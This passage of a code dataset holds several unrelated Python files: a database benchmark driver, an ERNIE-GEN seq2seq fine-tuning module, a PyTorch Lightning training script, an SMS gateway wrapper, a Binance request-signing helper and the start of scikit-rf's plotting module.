argo_test_suite.run_bench_queries(NUM_BENCH_ITERATIONS)\n log.info(\"Argo testing suite complete. \")\n\n\n if run_mongo_bench:\n generate_mongo_data = True\n load_mongo_data = True\n log.info(\"Beginning Mongo Benchmark.\")\n if generate_mongo_data:\n log.info(\"Mongo Generate new Data flag was true.\")\n remove_mongo_json_docs()\n log.info(\"Generating new data of size: {}.\".format(DATA_SIZE))\n MongoQueries.generate_data_mongo(DATA_SIZE)\n if load_mongo_data:\n log.info(\"Cleaning out MongoDB.\")\n mongo_test_suite.clean()\n log.info(\"Loading new data into MongoDB.\")\n mongo_test_suite.load_data()\n log.info(\"Running Mongo Benchmark Queries.\")\n mongo_test_suite.run_bench_queries(NUM_BENCH_ITERATIONS)\n log.info(\"Mongo testing suite complete. \")\n\n\n if run_pjson_bench:\n generate_pjson_data = True\n load_pjson_data = True\n log.info(\"Beginning PJson Benchmark.\")\n if generate_pjson_data:\n log.info(\"PJSON Generate new Data flag was true. Using Mongo's data.\")\n if load_pjson_data:\n log.info(\"Cleaning out PostgreSQL JSONB.\")\n pjson_test_suite.clean()\n log.info(\"Loading new data into PostgreSQL JSONB.\")\n pjson_test_suite.load_data()\n log.info(\"Running PJson Benchmark Queries.\")\n pjson_test_suite.run_bench_queries(NUM_BENCH_ITERATIONS)\n log.info(\"PJson testing suite complete. \")\n","sub_path":"benchdriver.py","file_name":"benchdriver.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"196893157","text":"# Copyright (c) 2020 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport time\nimport argparse\nimport numpy as np\nimport multiprocessing\nimport math\n\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.fluid.layers as layers\n\nfrom six.moves import xrange\n\nfrom model.ernie import ErnieModel\n\nfrom reader.tokenization import BasicTokenizer\nfrom eval.gen_eval import GenerationEval\n\n\nclass ErnieGenFinetune(object):\n def __init__(self, args, ernie_config, tokenizer):\n self.vocab = tokenizer.vocab\n self.inv_vocab = tokenizer.inv_vocab\n self.merge_subword = tokenizer.merge_subword\n self.attn_id = self.vocab[\"[ATTN]\"]\n self.eos_idx = self.vocab[\"[SEP]\"]\n self.ernie_config = ernie_config\n self.weight_sharing = args.weight_sharing\n self.task_type = args.task_type\n self.max_seq_len = args.max_seq_len\n self.use_fp16 = args.use_fp16\n self.label_smooth = args.label_smooth\n self.max_dec_len = args.max_dec_len\n self.beam_size = args.beam_size\n self.tgt_type_id = args.tgt_type_id\n self.continuous_position = args.continuous_position\n self.length_penalty = args.length_penalty\n self.do_decode = args.do_decode\n self.evaluator = GenerationEval(args, self.merge_subword)\n if self.task_type == \"dialog\":\n self.emb_keys = [\"word_embedding\", \"role_embedding\", \"turn_embedding\", \"pos_embedding\"]\n else:\n self.emb_keys = [\"word_embedding\", \"sent_embedding\", \"pos_embedding\"]\n\n def cal_logit(self, enc_out, tgt_pos):\n enc_out = fluid.layers.reshape(x=enc_out,\n shape=[-1, self.ernie_config[\"hidden_size\"]])\n if tgt_pos:\n tgt_pos = fluid.layers.cast(x=tgt_pos, dtype='int32')\n tgt_feat = fluid.layers.gather(input=enc_out, index=tgt_pos)\n else:\n tgt_feat = enc_out\n\n tgt_trans_feat = fluid.layers.fc(\n input=tgt_feat,\n size=self.ernie_config[\"emb_size\"] or self.ernie_config[\"hidden_size\"],\n act=self.ernie_config[\"hidden_act\"],\n param_attr=fluid.ParamAttr(\n name=\"mask_lm_trans_fc.w_0\",\n initializer=fluid.initializer.TruncatedNormal(scale=0.02)),\n bias_attr=fluid.ParamAttr(\n name=\"mask_lm_trans_fc.b_0\",\n initializer=fluid.initializer.Constant(0.)))\n\n tgt_trans_feat = fluid.layers.layer_norm(\n tgt_trans_feat,\n begin_norm_axis=len(tgt_trans_feat.shape) - 1,\n param_attr=fluid.ParamAttr(\n name='mask_lm_trans_layer_norm_scale',\n initializer=fluid.initializer.Constant(1.)),\n bias_attr=fluid.ParamAttr(\n name='mask_lm_trans_layer_norm_bias',\n initializer=fluid.initializer.Constant(1.)))\n\n\n seq2seq_out_bias_attr = fluid.ParamAttr(\n name=\"mask_lm_out_fc.b_0\",\n initializer=fluid.initializer.Constant(value=0.0))\n\n if self.weight_sharing:\n fc_out = fluid.layers.matmul(\n x=tgt_trans_feat,\n y=fluid.default_main_program().global_block().var(\n \"word_embedding\"),\n transpose_y=True)\n fc_out += fluid.layers.create_parameter(\n shape=[self.ernie_config['vocab_size']],\n dtype=\"float32\",\n 
attr=seq2seq_out_bias_attr,\n is_bias=True)\n else:\n out_size = self.ernie_config[\"tgt_vocab_size\"] or self.ernie_config['vocab_size']\n fc_out = fluid.layers.fc(input=tgt_trans_feat,\n size=out_size,\n param_attr=fluid.ParamAttr(\n name=\"mask_lm_out_fc.w_0\",\n initializer=fluid.initializer.TruncatedNormal(scale=0.02)),\n bias_attr=seq2seq_out_bias_attr)\n\n return fc_out\n\n def to_ternsor(self, shapes, dtypes, lod_levels):\n return [fluid.layers.data(name=\"placeholder_\" + str(i), shape=shapes[i], dtype=dtypes[i], \\\n lod_level=lod_levels[i]) for i in range(len(shapes))]\n\n def create_model(self, decoding=False):\n if decoding:\n return self.infilling_decode()\n\n if self.task_type == \"dialog\":\n emb_num = 4\n else:\n emb_num = 3\n input_shapes = [[-1, self.max_seq_len, 1]] * emb_num + \\\n [[-1, self.max_seq_len, self.max_seq_len]]\n query_input_shapes = [[-1, self.max_seq_len, 1]] * emb_num + \\\n [[-1, self.max_seq_len, self.max_seq_len * 2]]\n input_dtypes = ['int64'] * emb_num + ['float32']\n input_lod_levels = [0] * emb_num + [0]\n shapes = input_shapes + query_input_shapes + [[-1, 1], [-1, 1]]\n dtypes = input_dtypes * 2 + ['int64', 'int64']\n lod_levels = input_lod_levels * 2 + [0, 0]\n\n inputs = self.to_ternsor(shapes, dtypes, lod_levels)\n pyreader = fluid.io.DataLoader.from_generator(feed_list=inputs, capacity=50, iterable=False)\n\n emb_ids =[{}, {}]\n for key, value in zip(self.emb_keys, inputs[:emb_num]):\n emb_ids[0][key] = value\n for key, value in zip(self.emb_keys, inputs[emb_num + 1 : emb_num * 2 + 1]):\n emb_ids[1][key] = value\n\n input_mask, input_query_mask = inputs[emb_num], inputs[2 * emb_num + 1]\n tgt_labels, tgt_pos = inputs[-2:]\n\n ernie = ErnieModel(\n emb_ids=emb_ids,\n input_mask=[input_mask, input_query_mask],\n config=self.ernie_config,\n use_fp16=self.use_fp16,\n task_type=self.task_type)\n\n enc_out = ernie.get_sequence_output()\n fc_out = self.cal_logit(enc_out, tgt_pos)\n\n if self.label_smooth:\n out_size = self.ernie_config[\"tgt_vocab_size\"] or self.ernie_config['vocab_size']\n labels = fluid.layers.label_smooth(\n label=fluid.layers.one_hot(\n input=tgt_labels, depth=out_size),\n epsilon=self.label_smooth)\n\n ce_loss = layers.softmax_with_cross_entropy(\n logits=fc_out, label=labels, soft_label=True)\n #probs = fluid.layers.log(fluid.layers.softmax(fc_out))\n #ce_loss = fluid.layers.kldiv_loss(probs, labels, reduction='batchmean')\n else:\n ce_loss, probs = fluid.layers.softmax_with_cross_entropy(\n logits=fc_out, label=tgt_labels, return_softmax=True)\n\n loss = fluid.layers.mean(x=ce_loss)\n graph_vars = {\"loss\": loss}\n for k, v in graph_vars.items():\n v.persistable = True\n\n return pyreader, graph_vars\n\n def infilling_decode(self):\n if self.task_type == \"dialog\":\n emb_num = 4\n else:\n emb_num = 3\n input_shapes = [[-1, self.max_seq_len, 1]] * emb_num + \\\n [[-1, self.max_seq_len, self.max_seq_len]]\n input_dtypes = ['int64'] * emb_num + ['float32']\n input_lod_levels = [0] * emb_num + [0]\n\n shapes = input_shapes + [[-1, self.max_seq_len, 1], [-1, self.max_seq_len, 1],\n [-1, 1], [-1], [-1, 1, self.max_seq_len], [-1, 1]]\n dtypes = input_dtypes + ['int64', 'int64', 'float32', 'int32', 'float32', 'int64']\n lod_levels = input_lod_levels + [2, 2, 2, 0, 0, 0]\n\n inputs = self.to_ternsor(shapes, dtypes, lod_levels)\n pyreader = fluid.io.DataLoader.from_generator(feed_list=inputs, capacity=50, iterable=False)\n\n emb_ids = {}\n for key, value in zip(self.emb_keys, inputs[:emb_num]):\n emb_ids[key] = value\n\n input_mask 
= inputs[emb_num] \n tgt_ids, tgt_pos, init_scores, parent_idx, tgt_input_mask, data_ids = inputs[-6:]\n\n ernie = ErnieModel(\n emb_ids=emb_ids,\n input_mask=input_mask,\n config=self.ernie_config,\n use_fp16=self.use_fp16,\n task_type=self.task_type,\n decoding=True,\n gather_idx=parent_idx)\n\n max_len = layers.fill_constant(\n shape=[1], dtype=tgt_ids.dtype, value=self.max_dec_len, force_cpu=True)\n step_idx = layers.fill_constant(\n shape=[1], dtype=tgt_ids.dtype, value=0, force_cpu=True)\n pos_idx = layers.fill_constant(\n shape=[1], dtype=tgt_ids.dtype, value=1, force_cpu=True)\n cond = layers.less_than(x=step_idx, y=max_len) \n while_op = layers.While(cond)\n \n ids = layers.array_write(\n layers.reshape(tgt_ids, (-1, 1)), step_idx)\n pos_biases = layers.array_write(layers.reshape(tgt_pos, (-1, 1)), step_idx)\n scores = layers.array_write(init_scores, step_idx)\n tgt_masks = layers.array_write(tgt_input_mask, step_idx)\n\n with while_op.block():\n pre_ids = layers.array_read(array=ids, i=step_idx)\n pre_ids = layers.reshape(pre_ids, (-1, 1, 1), inplace=True)\n pre_scores = layers.array_read(array=scores, i=step_idx)\n pos_bias = layers.array_read(array=pos_biases, i=step_idx)\n pos_bias = layers.gather(input=pos_bias, index=parent_idx)\n tmp_mask = layers.array_read(tgt_masks, i=step_idx) \n\n def gen_batch_like(value, dtype=\"int64\", shape=[-1, 1, 1], is_scalar=True):\n if is_scalar:\n return layers.fill_constant_batch_size_like(\n input=parent_idx, value=value, shape=shape, dtype=dtype) \n else:\n return layers.elementwise_mul(\n x=layers.fill_constant_batch_size_like(\n input=parent_idx, value=1, shape=shape, dtype=dtype),\n y=value, axis=0)\n\n tmp_mask = layers.gather(input=tmp_mask, index=parent_idx)\n append_0_mask = gen_batch_like(0.0, dtype=tmp_mask.dtype)\n append_1_mask = gen_batch_like(1.0, dtype=tmp_mask.dtype)\n tmp_mask = layers.concat([tmp_mask, append_1_mask], axis=2)\n pre_mask = layers.concat([tmp_mask, append_0_mask], axis=2)\n cur_mask = layers.concat([tmp_mask, append_1_mask], axis=2)\n\n cur_ids = gen_batch_like(self.attn_id)\n pre_pos = gen_batch_like(step_idx, is_scalar=False)\n cur_pos = gen_batch_like(pos_idx, is_scalar=False)\n if self.continuous_position:\n pre_pos = pre_pos + pos_bias\n cur_pos = cur_pos + pos_bias\n\n dec_emb_ids = {\"word_embedding\": layers.concat([pre_ids, cur_ids], axis=1),\n \"pos_embedding\": layers.concat([pre_pos, cur_pos], axis=1)}\n if self.task_type == \"dialog\":\n role_ids = gen_batch_like(0)\n turn_ids = gen_batch_like(0)\n dec_emb_ids[\"role_embedding\"] = layers.concat([role_ids, role_ids], axis=1)\n dec_emb_ids[\"turn_embedding\"] = layers.concat([turn_ids, turn_ids], axis=1)\n else:\n sent_ids= gen_batch_like(self.tgt_type_id)\n dec_emb_ids[\"sent_embedding\"] = layers.concat([sent_ids, sent_ids], axis=1)\n dec_mask = layers.concat([pre_mask, cur_mask], axis=1)\n\n dec_out = ernie.encode(dec_emb_ids, dec_mask, parent_idx, remove_query=True)\n fc_out = self.cal_logit(dec_out[:, 1:, :], None)\n topk_scores, topk_indices = layers.topk(\n input=layers.softmax(fc_out), k=self.beam_size)\n pre_lenpen = layers.pow((5.0 + layers.cast(step_idx, pre_scores.dtype)) / 6.0,\n self.length_penalty)\n cur_lenpen = layers.pow((5.0 + layers.cast(pos_idx, pre_scores.dtype)) / 6.0,\n self.length_penalty)\n accu_scores = layers.elementwise_add(\n x=layers.log(topk_scores), y=pre_scores * pre_lenpen, axis=0) / cur_lenpen\n topk_indices = layers.lod_reset(topk_indices, pre_ids)\n accu_scores = layers.lod_reset(accu_scores, pre_ids)\n 
selected_ids, selected_scores, gather_idx = layers.beam_search(\n pre_ids=pre_ids,\n pre_scores=pre_scores,\n ids=topk_indices,\n scores=accu_scores,\n beam_size=self.beam_size,\n end_id=self.eos_idx,\n return_parent_idx=True)\n\n layers.increment(x=step_idx, value=1.0, in_place=True)\n layers.increment(x=pos_idx, value=1.0, in_place=True)\n layers.array_write(selected_ids, i=step_idx, array=ids)\n layers.array_write(selected_scores, i=step_idx, array=scores)\n layers.array_write(tmp_mask, i=step_idx, array=tgt_masks)\n layers.array_write(pos_bias, i=step_idx, array=pos_biases)\n\n layers.assign(gather_idx, parent_idx)\n length_cond = layers.less_than(x=step_idx, y=max_len)\n finish_cond = layers.logical_not(layers.is_empty(x=selected_ids))\n layers.logical_and(x=length_cond, y=finish_cond, out=cond)\n\n finished_ids, finished_scores = layers.beam_search_decode(\n ids, scores, beam_size=self.beam_size, end_id=self.eos_idx)\n\n graph_vars = {\n \"finished_ids\": finished_ids,\n \"finished_scores\": finished_scores,\n \"data_ids\": data_ids\n }\n\n for k, v in graph_vars.items():\n v.persistable = True\n\n return pyreader, graph_vars\n\n def post_process_seq(self, seq):\n \"\"\"\n Post-process the beam-search decoded sequence. Truncate from the first\n and remove the and tokens currently.\n \"\"\"\n eos_pos = len(seq)\n for i, idx in enumerate(seq):\n if idx == self.eos_idx:\n eos_pos = i\n break\n seq = seq[1:eos_pos]\n return seq\n\n def evaluate(self, resource, eval_phase, graph_vars, features=None,\n output_path=None, dev_count=1, gpu_id=0,is_pred=False):\n\n exe, program, pyreader = resource[\"exe\"], resource[\"program\"], resource[\"pyreader\"]\n\n if eval_phase == \"train\":\n fetch_list = [graph_vars[\"loss\"].name]\n if \"learning_rate\" in graph_vars:\n fetch_list.append(graph_vars[\"learning_rate\"].name)\n outputs = exe.run(fetch_list=fetch_list)\n np_loss = outputs[0]\n ret = {\"loss\": np.mean(np_loss), \"ppl\": np.exp(np.mean(np_loss))}\n if \"learning_rate\" in graph_vars:\n ret[\"learning_rate\"] = float(outputs[1][0])\n return ret\n\n if self.do_decode:\n return_numpy = False\n outfile = output_path + \"/\" + eval_phase\n outfile_part = outfile + \".part\" + str(gpu_id)\n writer = open(outfile_part, \"w\")\n fetch_keys = [\"finished_ids\", \"finished_scores\", \"data_ids\"]\n else:\n steps = 0\n cost = 0.0\n return_numpy = True\n fetch_keys = [\"loss\"]\n\n fetch_list = [graph_vars[key].name for key in fetch_keys]\n\n pred_list = []\n\n time_begin = time.time()\n pyreader.start()\n while True:\n try:\n outputs = exe.run(program=program, fetch_list=fetch_list,\n return_numpy=return_numpy)\n if not self.do_decode:\n np_loss = outputs[0]\n cost += np.mean(np_loss)\n steps += 1\n else:\n seq_ids, seq_scores, data_ids = outputs\n seq_ids_list, seq_scores_list = [seq_ids], [\n seq_scores] if isinstance(\n seq_ids, paddle.fluid.core.LoDTensor) else (seq_ids, seq_scores)\n\n data_ids = np.array(data_ids).reshape(-1).tolist()\n data_idx = 0\n\n for seq_ids, seq_scores in zip(seq_ids_list, seq_scores_list):\n # How to parse the results:\n # Suppose the lod of seq_ids is:\n # [[0, 3, 6], [0, 12, 24, 40, 54, 67, 82]]\n # then from lod[0]:\n # there are 2 source sentences, beam width is 3.\n # from lod[1]:\n # the first source sentence has 3 hyps; the lengths are 12, 12, 16\n # the second source sentence has 3 hyps; the lengths are 14, 13, 15\n #hyps = [[] for i in range(len(seq_ids.lod()[0]) - 1)]\n #scores = [[] for i in range(len(seq_scores.lod()[0]) - 1)]\n for i in 
range(len(seq_ids.lod()[0]) -1): # for each source sentence\n                            start = seq_ids.lod()[0][i]\n                            end = seq_ids.lod()[0][i + 1]\n                            max_cand = None\n                            for j in range(end - start): # for each candidate\n                                sub_start = seq_ids.lod()[1][start + j]\n                                sub_end = seq_ids.lod()[1][start + j + 1]\n                                tokens = [self.inv_vocab.get(idx, \"[UNK]\")\n                                          for idx in self.post_process_seq(\n                                    np.array(seq_ids)[sub_start:sub_end])\n                                ]\n                                score = np.array(seq_scores)[sub_end - 1]\n                                if (not max_cand) or score > max_cand[1]:\n                                    max_cand = (tokens, score)\n\n                            data_id = data_ids[data_idx]\n                            data_idx += 1\n                            pred = self.merge_subword(max_cand[0])\n                            writer.write(\"%d\\t%s\\n\" % (data_id, \" \".join(pred).encode(\"utf8\")))\n                            pred_list.append(pred)\n\n            except fluid.core.EOFException:\n                pyreader.reset()\n                break\n\n        eval_result = \"no result\"\n\n        if eval_phase=='pred_output':\n            # fl = open(\"datasets/squad_qg/output.txt\",\"w\")\n            # fl.flush()\n            result = []\n            text = None\n            for p in pred_list:\n                text = ' '.join(p)\n                result.append(text)\n            return result\n            # fl.write(text+\" \\n\")\n            # fl.close()\n\n\n        if not self.do_decode:\n            eval_result = \"loss: %f, ppl: %f\" % (cost / steps, np.exp(cost / steps))\n        elif not is_pred:\n            writer.close()\n            tmp_writer = open(\"%s/%s_dec_finish.%d\" % (output_path, eval_phase, gpu_id), \"w\")\n            tmp_writer.close()\n            if gpu_id != 0:\n                return\n            while True:\n                ret = os.popen('find %s -maxdepth 1 -name \"%s_dec_finish.*\"' %\n                               (output_path, eval_phase)).readlines()\n                if len(ret) != dev_count:\n                    time.sleep(1)\n                    continue\n                else:\n                    break\n\n            time_end = time.time()\n            # This one, right?\n            # sort -t$'\\t' -k1n dev_output.part* |awk -F\"\\t\" '{print $2}'> dev_output\n            # print('---------------------------------------------------------------------------------------------------------')\n            # print(outfile)\n            # print(\"sort -t$\\t -k1n %s.part* |awk -F\\\"\\t\\\" '{print $2}'> %s\" %\n            #       (outfile, outfile))\n            # print('---------------------------------------------------------------------------------------------------------')\n            os.system(\"sort -t$\\t -k1n %s.part* |awk -F\\\"\\t\\\" '{print $2}'> %s\" %\n                      (outfile, outfile))\n            os.system(\"rm %s.part*\" % (outfile))\n            os.system(\"rm %s/%s_dec_finish.*\" % (output_path, eval_phase))\n\n            eval_result = self.evaluator.eval(outfile,\n                phase=eval_phase.split(\"_\")[0], features=features)\n            print(\"[%s evaluation] %s, elapsed time: %f s\"\n                  % (eval_phase, eval_result, time_end - time_begin))\n","sub_path":"finetune/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":20962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629361185","text":"# from typing import List\n\nimport os\nimport sys\nimport torch\n# import logging\nfrom argparse import ArgumentParser\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.callbacks import ModelCheckpoint, LearningRateMonitor\nsys.path.append(os.path.join(os.getcwd(), 'src'))\nfrom utils.parameters import process_parameters_yaml\nfrom data.dataloader import KGDataset, Dataset\nfrom models.k_bert import KBert\nfrom models.bert import Bert\n\n\ndef load_data(args, mode='train'):\n    print(f\"Loading Dataset: {args.dataset}\")\n    if args.model == 'kbert':\n        data = KGDataset(args)\n    elif args.model == 'bert':\n        data = Dataset(args)\n    else:\n        raise Exception(\"No model\")\n    data.prepare_data()\n    data.setup()\n    if mode == 'train':\n        print(f\"Number of train samples: {data.len_train()}\")\n        
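# A standalone sketch of the two-level LoD walk documented in the seq2seq
# evaluate() comments above, using the example lod given there: lod[0]
# delimits source sentences, lod[1] delimits the hypotheses of each one.
lod = [[0, 3, 6], [0, 12, 24, 40, 54, 67, 82]]
for i in range(len(lod[0]) - 1):          # for each source sentence
    start, end = lod[0][i], lod[0][i + 1]
    lengths = [lod[1][j + 1] - lod[1][j] for j in range(start, end)]
    print("sentence %d: %d hyps, token lengths %s" % (i, end - start, lengths))
# -> sentence 0: 3 hyps, token lengths [12, 12, 16]
# -> sentence 1: 3 hyps, token lengths [14, 13, 15]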
print(f\"Number of val samples: {data.len_val()}\")\n print(f\"Number of test samples: {data.len_test()}\")\n return data\n\n\ndef load_model(args, params):\n if args.model == 'kbert':\n model = KBert\n elif args.model == 'bert':\n model = Bert\n else:\n raise Exception(\"No model\")\n if args.checkpoint:\n print('Loading Checkpoint')\n checkpoint_path = f'checkpoints/{args.model}/{args.checkpoint}'\n model = model.load_from_checkpoint(checkpoint_path)\n else:\n print(f\"Loading Model: {args.model}\")\n model = model(params)\n return model\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--dataset', default='agnews')#, choices=[\"agnews\"])\n parser.add_argument('--model', default='kbert', choices=[\"kbert\", \"bert\"])\n parser.add_argument('--batch_size', default=16, type=int)\n parser.add_argument('--max_epochs', default=100, type=int)\n parser.add_argument('--lr', default=None, type=float)\n parser.add_argument('--lr_update', default=None, type=int)\n parser.add_argument('--gpus', default=1, type=int)\n parser.add_argument('--checkpoint', default=None, type=str)\n parser.add_argument('--sample_data', default=None, type=int, help=\"size of smaller dataset\")\n parser.add_argument('--overfit', default=False, action='store_true')\n args = parser.parse_args()\n params = process_parameters_yaml()\n\n if args.lr:\n params['learning_rate'] = args.lr\n if args.lr_update:\n params['lr_update'] = args.lr_update\n params['num_classes'] = params[f'{args.dataset}_num_classes']\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n data = load_data(args)\n\n model = load_model(args, params).to(device)\n\n experiment = f'batch_size_{args.batch_size}-max_epoch{args.max_epochs}-sample_{args.sample_data}-overfit_{args.overfit}'\n logger = TensorBoardLogger(save_dir=f'logs/{args.model}', name=experiment)\n checkpoint_callback = ModelCheckpoint(monitor='val_loss',\n dirpath=f'checkpoints/{args.model}/{experiment}',\n filename='{epoch}-{step}-{val_loss:.2f}',\n every_n_val_epochs=1)\n lr_monitor = LearningRateMonitor(logging_interval='epoch')\n\n trainer = Trainer(gpus=args.gpus,\n logger=logger,\n max_epochs=args.max_epochs,\n callbacks=[checkpoint_callback, lr_monitor])\n\n trainer.fit(model, datamodule=data)\n trainer.test(model, datamodule=data)\n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86578197","text":"#!/usr/bin/env python\n# coding=utf-8\nimport time\nimport json\nimport base64\nfrom urllib import urlencode\nfrom taurusxradius.taurusxlib import apiutils\nfrom taurusxradius.taurusxlib import logger\nfrom taurusxradius.taurusxlib import utils\nfrom taurusxradius.taurusxlib.smsutils import smscn\nfrom taurusxradius.taurusxlib.smsutils import qcloud\nfrom taurusxradius.taurusxlib.smsutils import sendcloud\nfrom taurusxradius.taurusxlib.smsutils import taurusxcloud\nfrom taurusxradius.taurusxlib.btforms import rules\nfrom cyclone import httpclient\nfrom twisted.internet import defer\n\nclass SmsApi(object):\n\n def __init__(self):\n self.gateways = ['taurusxcloud',\n 'smscn',\n 'qcloud',\n 'sendcloud']\n self.smscalls = {}\n\n def get_instance(self, gateway, apikey, apisecret):\n if gateway in self.smscalls:\n return self.smscalls[gateway]\n if gateway == 'smscn':\n self.smscalls[gateway] = smscn.SmsApi(apikey, apisecret)\n elif gateway == 'qcloud':\n self.smscalls[gateway] = 
qcloud.SmsApi(apikey, apisecret)\n        elif gateway == 'sendcloud':\n            self.smscalls[gateway] = sendcloud.SmsApi(apikey, apisecret)\n        elif gateway == 'taurusxcloud':\n            self.smscalls[gateway] = taurusxcloud.SmsApi(apikey, apisecret)\n        return self.smscalls.get(gateway)\n\n    @defer.inlineCallbacks\n    def send_sms(self, gateway, apikey, apisecret, sendphone, tplid, args = [], kwargs = {}):\n        if gateway not in self.gateways:\n            raise ValueError(u'gateway [%s] not support' % gateway)\n        if not rules.is_mobile.valid(sendphone):\n            raise ValueError(u'sendsms: %s mobile format error' % sendphone)\n        try:\n            api = self.get_instance(gateway, apikey, apisecret)\n            resp = yield api.send_sms(sendphone, tplid, args=args, kwargs=kwargs)\n            defer.returnValue(resp)\n        except Exception as err:\n            logger.exception(err)\n            defer.returnValue(False)\n\n\n_smsapi = SmsApi()\nsend_sms = _smsapi.send_sms","sub_path":"taurusxradius/common/smsapi.py","file_name":"smsapi.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"156286155","text":"#!/usr/bin/env python\nimport csv, time, datetime, os, requests, sys, json, logging, hmac\nBASE_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH)\nfrom hashlib import sha256\nfrom lib import config, general\n\nendpoint = config.binance().get('BASE_API')\napi_key = config.binance().get('KEY')\nsecret = config.binance().get('SECRET')\n\n# # enable REQUESTS logging\n# logging.basicConfig()\n# logging.getLogger().setLevel(logging.DEBUG)\n# requests_log = logging.getLogger(\"requests.packages.urllib3\")\n# requests_log.setLevel(logging.DEBUG)\n# requests_log.propagate = True\n\n# generate_param_body(True)                          generate signed signature key with only timestamp\n# generate_param_body(True, foo1=bar1, foo2=bar2)    signed with parameters\n# generate_param_body(False, foo1=bar1, foo2=bar2)   unsigned with parameters\n# generate_param_body(foo1=bar1, foo2=bar2)          unsigned with parameters\n# generate_param_body()                              unsigned no parameters\ndef generate_param(signature=False, **kwargs):\n    x = dict(generate_param_body(dict(kwargs), signature))\n    return x\n\ndef generate_param_body(param_dict, signature):\n    timestamp=str(general.servertime())\n    param_dict['timestamp']=timestamp\n    if signature:\n        param_dict['signature']=generate_signature(param_dict)\n        print ('BODY TRUE: ', param_dict )\n        return param_dict\n    else:\n        print ('BODY FALSE: ', param_dict )\n        return param_dict\n\ndef generate_signature(query_dict):\n    tmp_query_string=''\n    for x in query_dict.keys():\n        tmp_query_string+=x+'='+query_dict[x]+'&'\n    tmp_query_string=tmp_query_string[:-1]\n    return hmac.new(secret.encode('utf-8'), tmp_query_string.encode('utf-8'), sha256).hexdigest()\n\n    # # hardcoded values from API example\n    # print (tmp_query_string, secret)\n    # tmp_query=b'symbol=LTCBTC&side=BUY&type=LIMIT&timeInForce=GTC&quantity=1&price=0.1&recvWindow=5000&timestamp=1499827319559'\n    # tmp_secret=b'NhqPtmdSJYdKjVHjA7PZj4Mge3R5YNiP1e3UZjInClVN65XAbvqqM6A7H5fATj0j'\n    # return hmac.new(tmp_secret, tmp_query, hashlib.sha256).hexdigest()\n\nif __name__ == \"__main__\":\n    print( generate_param(True) )\n\n    # print (os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n    # print (config.binance().get('SECRET'))\n","sub_path":"lib/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
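# A standalone sketch of the signing scheme implemented by generate_signature()
# in query.py above: the parameters are joined into "k=v&k=v" form and the
# HMAC-SHA256 hex digest of that string, keyed with the API secret, is appended
# as the "signature" parameter. The secret and parameter values below are dummy
# placeholders, not real credentials.
import hmac
from hashlib import sha256

def sign(params, secret):
    query = '&'.join('%s=%s' % (k, v) for k, v in params.items())
    return hmac.new(secret.encode('utf-8'), query.encode('utf-8'), sha256).hexdigest()

params = {'symbol': 'LTCBTC', 'side': 'BUY', 'timestamp': '1499827319559'}
params['signature'] = sign(params, 'dummy-secret')
print(params['signature'])    # 64-character hex digest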
+{"seq_id":"209504337","text":"\"\"\"\nplotting (:mod:`skrf.plotting`)\n========================================\n\n\nThis module provides general plotting functions.\n\nPlots and Charts\n------------------\n\n.. autosummary::\n :toctree: generated/\n\n smith\n plot_smith\n plot_rectangular\n plot_polar\n plot_complex_rectangular\n plot_complex_polar\n plot_v_frequency\n plot_it_all\n\n plot_minmax_bounds_component\n plot_minmax_bounds_s_db\n plot_minmax_bounds_s_db10\n plot_minmax_bounds_s_time_db\n\n plot_uncertainty_bounds_component\n plot_uncertainty_bounds_s\n plot_uncertainty_bounds_s_db\n plot_uncertainty_bounds_s_time_db\n\n plot_passivity\n plot_logsigma\n\n plot_circuit_graph\n\n plot_contour\n\nConvenience plotting functions\n-------------------------------\n.. autosummary::\n :toctree: generated/\n\n stylely\n subplot_params\n shade_bands\n save_all_figs\n scale_frequency_ticks\n add_markers_to_lines\n legend_off\n func_on_all_figs\n scrape_legend\n signature\n\n\"\"\"\nfrom . constants import NumberLike\nfrom numbers import Number\nfrom typing import Callable, Tuple, Union, List\nimport os\nimport warnings\n\nimport numpy as npy\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib import ticker, rcParams\nfrom matplotlib.patches import Circle # for drawing smith chart\nfrom matplotlib.pyplot import quiver\nfrom matplotlib.dates import date2num\nimport matplotlib.tri as tri\n\nfrom . import network, frequency, calibration, networkSet, circuit\nfrom . import mathFunctions as mf\nfrom . util import now_string_2_dt\n\ntry:\n import networkx as nx\nexcept ImportError as e:\n pass\n\nSI_PREFIXES_ASCII = 'yzafpnum kMGTPEZY'\nSI_CONVERSION = {key: 10**((8-i)*3) for i, key in enumerate(SI_PREFIXES_ASCII)}\n\n\ndef scale_frequency_ticks(ax: plt.Axes, funit: str):\n \"\"\"\n Scale frequency axis ticks.\n\n Parameters\n ----------\n ax : plt.Axes\n Matplotlib figure axe\n funit : str\n frequency unit string as in :data:`~skrf.frequency.Frequency.unit`\n\n Raises\n ------\n ValueError\n if invalid unit is passed\n 